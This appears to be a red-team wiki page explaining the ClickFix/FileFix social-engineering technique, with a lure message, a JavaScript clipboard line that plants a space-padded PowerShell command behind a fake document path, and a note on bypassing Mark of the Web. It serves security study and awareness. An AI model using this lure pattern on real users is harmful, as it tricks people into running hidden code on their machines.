clickfix.md (1750B)
1 --- 2 title: "ClickFix" 3 section: "Red Team" 4 sectionSlug: "redteam" 5 sourcePath: "docs/redteam/access/clickfix.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/redteam/access/clickfix.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # ClickFix 12 13 > ClickFix is a social engineering attack that prompts users to unknowingly execute malicious code, usually through the Run Dialog (`Windows Key + R`). 14 15 ## FileFix 16 17 Display a message to the user to lure him into copying and pasting a command in a shell or equivalent (File Explorer). 18 19 ```ps1 20 To access the file, follow these steps: 21 1. Copy the file path below: 22 `C:\company\internal-secure\filedrive\HRPolicy.docx` 23 2. Open File Explorer and select the address bar (CTRL + L) 24 3. Paste the file path and press Enter 25 ``` 26 27 When the user clicks on the "COPY" button, it should set the content of his clipboard to the following. 28 29 ```ps1 30 navigator.clipboard.writeText("powershell.exe -c ping example.com # C:\\company\\internal-secure\\filedrive\\HRPolicy.docx "); 31 ``` 32 33 Here, a few tricks have been added to improve the efficiency of the payload: 34 35 * Multiple spaces to hide the start of the payload 36 * A comment with `#` containing a fake path to the document 37 38 Executable files (e.g. .exe) executed through the File Explorer’s address bar have their Mark of The Web (MOTW) attribute removed. 39 40 ## References 41 42 * [FileFix - A ClickFix Alternative - mrd0x - June 23, 2025](https://mrd0x.com/filefix-clickfix-alternative/) 43 * [FileFix (Part 2) - mrd0x - June 30, 2025](https://mrd0x.com/filefix-part-2/)